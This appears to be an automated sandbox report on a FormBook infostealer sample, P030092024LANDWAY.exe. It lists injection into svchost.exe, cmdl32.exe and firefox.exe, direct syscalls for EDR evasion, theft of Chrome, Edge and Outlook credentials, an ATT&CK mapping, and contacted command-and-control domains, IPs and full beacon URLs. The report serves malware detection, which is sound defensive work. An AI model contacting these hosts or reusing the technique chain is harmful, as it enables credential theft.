            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F626 mov eax, dword ptr fs:[00000030h]2_2_0382F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F626 mov eax, dword ptr fs:[00000030h]2_2_0382F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F626 mov eax, dword ptr fs:[00000030h]2_2_0382F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F626 mov eax, dword ptr fs:[00000030h]2_2_0382F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382F626 mov eax, dword ptr fs:[00000030h]2_2_0382F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03866620 mov eax, dword ptr fs:[00000030h]2_2_03866620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03905636 mov eax, dword ptr fs:[00000030h]2_2_03905636
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868620 mov eax, dword ptr fs:[00000030h]2_2_03868620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383262C mov eax, dword ptr fs:[00000030h]2_2_0383262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384C640 mov eax, dword ptr fs:[00000030h]2_2_0384C640

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Yara detected Powershell download and execute
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2644, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: BpYpWzndkWcpUJ.exe PID: 3880, type: MEMORYSTR
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmdl32.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: NULL target: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: NULL target: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\cmdl32.exeThread register set: target process: 5940Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\cmdl32.exeThread APC queued: target process: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F4A008Jump to behavior
            Source: C:\Users\user\Desktop\P030092024LANDWAY.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\P030092024LANDWAY.exe"Jump to behavior
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeProcess created: C:\Windows\SysWOW64\cmdl32.exe "C:\Windows\SysWOW64\cmdl32.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: BpYpWzndkWcpUJ.exe, 00000006.00000002.4605196059.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000006.00000000.2409582553.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000000.2558031469.0000000001281000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: BpYpWzndkWcpUJ.exe, 00000006.00000002.4605196059.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000006.00000000.2409582553.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000000.2558031469.0000000001281000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: BpYpWzndkWcpUJ.exe, 00000006.00000002.4605196059.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000006.00000000.2409582553.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000000.2558031469.0000000001281000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: BpYpWzndkWcpUJ.exe, 00000006.00000002.4605196059.0000000000E60000.00000002.00000001.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000006.00000000.2409582553.0000000000E61000.00000002.00000001.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000000.2558031469.0000000001281000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4607447719.0000000004390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4615262258.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4607493731.00000000043E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490404143.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490732438.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4606443836.0000000002510000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\cmdl32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\cmdl32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\cmdl32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4607447719.0000000004390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4615262258.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4607493731.00000000043E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490404143.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490732438.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4606443836.0000000002510000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		412
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Abuse Elevation Control Mechanism            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
            Obfuscated Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Software Packing            		Cached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522543 Sample: P030092024LANDWAY.exe Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 28 www.rtpterbaruwaktu3.xyz 2->28 30 www.restobarbebek.xyz 2->30 32 20 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 P030092024LANDWAY.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 BpYpWzndkWcpUJ.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 cmdl32.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 BpYpWzndkWcpUJ.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.tophfy.info 203.161.41.205, 58779, 58780, 58781 VNPT-AS-VNVNPTCorpVN Malaysia 22->34 36 accupower.tech 217.160.0.158, 58800, 58801, 58802 ONEANDONE-ASBrauerstrasse48DE Germany 22->36 38 9 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            P030092024LANDWAY.exe29%VirustotalBrowse
            P030092024LANDWAY.exe29%ReversingLabsWin32.Trojan.Swotter
            P030092024LANDWAY.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            natroredirect.natrocdn.com0%VirustotalBrowse
            030002837.xyz0%VirustotalBrowse
            accupower.tech1%VirustotalBrowse
            mondayigboleague.info0%VirustotalBrowse
            www.mondayigboleague.info0%VirustotalBrowse
            www.accupower.tech1%VirustotalBrowse
            www.8zu934.vip0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.mondayigboleague.info0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.tophfy.info
            		203.161.41.205
            		truetrue
              		unknown
              8zu934.vip
              		3.33.130.190
              		truetrue
                		unknown
                www.18kwatch.com
                		202.87.223.248
                		truetrue
                  		unknown
                  www.x4wrqqc2tn.sbs
                  		172.217.31.4
                  		truefalse
                    		unknown
                    www.it9.shop
                    		121.254.178.239
                    		truetrue
                      		unknown
                      natroredirect.natrocdn.com
                      		85.159.66.93
                      		truetrueunknown
                      030002837.xyz
                      		65.21.196.90
                      		truetrueunknown
                      www.cqghwamc.top
                      		221.128.225.57
                      		truetrue
                        		unknown
                        accupower.tech
                        		217.160.0.158
                        		truetrueunknown
                        mondayigboleague.info
                        		3.33.130.190
                        		truetrueunknown
                        redirect.3dns.box
                        		172.191.244.62
                        		truetrue
                          		unknown
                          yesonkoicasino.net
                          		3.33.130.190
                          		truetrue
                            		unknown
                            rtpterbaruwaktu3.xyz
                            		103.21.221.87
                            		truetrue
                              		unknown
                              www.030002837.xyz
                              		unknown
                              		unknowntrue
                                		unknown
                                www.8zu934.vip
                                		unknown
                                		unknowntrueunknown
                                www.restobarbebek.xyz
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.accupower.tech
                                  		unknown
                                  		unknowntrueunknown
                                  www.yesonkoicasino.net
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.rtpterbaruwaktu3.xyz
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.mondayigboleague.info
                                      		unknown
                                      		unknowntrueunknown
                                      www.dguy4youguys.wtf
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.tophfy.info/pzb3/?YDT4P=4xd8DzO&9jtPKX=cGw2exDyh1KVkWsHkX4xj4lgVlPPukG30+Eeh6IH5uNyYRC1xGnnB8QFExEpiTL5bcBgsA98LG9yqfxBLyBILpDqP6cmLzlnqu2CIAVnl8NdZZMCWNNFkUmCCHKhOgovLr644XM=true
                                          		unknown
                                          http://www.8zu934.vip/chjf/?9jtPKX=XAGDPb2hYSNA1G205B9yTUGnAX8dO+7zB1cLVHckxJo5ahU/aASovO/kl86KK2t3BQ9RD7nwrojXFmbxG19h+PHx3PeB45qZXKA/WsiIO1RcOY79PupkSKjjj5g2/+z2ZvrlzLs=&YDT4P=4xd8DzOtrue
                                            		unknown
                                            http://www.yesonkoicasino.net/k9l7/true
                                              		unknown
                                              http://www.mondayigboleague.info/zeyp/true
                                                		unknown
                                                http://www.restobarbebek.xyz/ym4w/true
                                                  		unknown
                                                  http://www.tophfy.info/pzb3/true
                                                    		unknown
                                                    http://www.accupower.tech/ojw7/?9jtPKX=Oep6mOdcbJS8M33gn6lJDCgdhZprpWT1xYap2DCm99RWzR/+rod5DkimcY1te6tRP4YAPOidnC7q9fyBbp+p4w7BxYlfBAVSQr378a/zqULvDaURYind12ZcUgt4zzVfKlFhbII=&YDT4P=4xd8DzOtrue
                                                      		unknown
                                                      http://www.x4wrqqc2tn.sbs/6a3e/?9jtPKX=BZZMppAtEsJZC+SCGnDJwYc0a7P3I2XUnV0yTl1cw/B5eiAAMyS7zeU40ykuIimpo83S7m3PRw3Wl4+UmttGxit0iCQT0nNXqtGO1eivbt9K3y3Fy6qkJMw6sxrg0uoowV+p4EU=&YDT4P=4xd8DzOfalse
                                                        		unknown
                                                        http://www.it9.shop/ecky/true
                                                          		unknown
                                                          http://www.mondayigboleague.info/zeyp/?9jtPKX=Qp4X+LIjfewVnP6Y/skPG2AcibCDaQ9iuVCW0N7JhhnFM66mIUNO5YOiETDrAwi/zOtbLxRIZ8WmNUxfXqqXG7p6mEX8KWQILlPapVZ7FdK1llaTtR9WIeGVSAX1maOrISYOTkE=&YDT4P=4xd8DzOtrue
                                                            		unknown
                                                            http://www.accupower.tech/ojw7/true
                                                              		unknown
                                                              http://www.18kwatch.com/huyu/true
                                                                		unknown
                                                                http://www.it9.shop/ecky/?9jtPKX=E8yFMNT5NJgwX+ypl/nybltVULshlwvllIqWYsZuB87EHRd+pdJnIfFxHoxvfPrOXGrS+SNOBaUo3+/x93yIjDBeJAA65d0dctOoKHWlJneMt2c+UnLgAV484ZeCTpIzlpd+zvA=&YDT4P=4xd8DzOtrue
                                                                  		unknown
                                                                  http://www.030002837.xyz/zl45/true
                                                                    		unknown
                                                                    http://www.18kwatch.com/huyu/?9jtPKX=6Z1wBk7RYwBPGlswbf+1K+rZouoL6hxCsE01bzPZVmnRPi6w4QFoc0Kr9wwe5SYV2Krnjruyq1yW2kXKM8ywVSDOHER5s93YVzLABz8XusiexAKM+GOGLDXayUXcrjkYWYPbXVo=&YDT4P=4xd8DzOtrue
                                                                      		unknown
                                                                      http://www.rtpterbaruwaktu3.xyz/v6un/true
                                                                        		unknown
                                                                        http://www.restobarbebek.xyz/ym4w/?YDT4P=4xd8DzO&9jtPKX=LS2dTmeF3OBn8G1tQUmCXYTIgtzicGlzjT2aVYBBrxZqGpjDVT9zDZ74on3XL6wvhAoqbJrICZyPh8boIihM0FmnY1HfyNJnnrRiM85d/p0/MDPjGflqx28U0PmHY+963/VActc=true
                                                                          		unknown
                                                                          http://www.cqghwamc.top/84h5/true
                                                                            		unknown
                                                                            http://www.x4wrqqc2tn.sbs/6a3e/false
                                                                              		unknown
                                                                              http://www.cqghwamc.top/84h5/?9jtPKX=m90qfEx2Waj4M3qzKISaRwMNBxrGGJIjHL8e3ySRPK8oLcpI6mSZixZy+bRbuIjP1deJ2nKHD1dx+QvwZSZ/OQME4y6EqRE6EL+tH5CvtKetzx16bnZNcksA/ftcr1t/EGD4XGU=&YDT4P=4xd8DzOtrue
                                                                                		unknown
                                                                                http://www.8zu934.vip/chjf/true
                                                                                  		unknown

                                                                                  URLs from Memory and Binaries

                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                  https://duckduckgo.com/chrome_newtabcmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://duckduckgo.com/ac/?q=cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
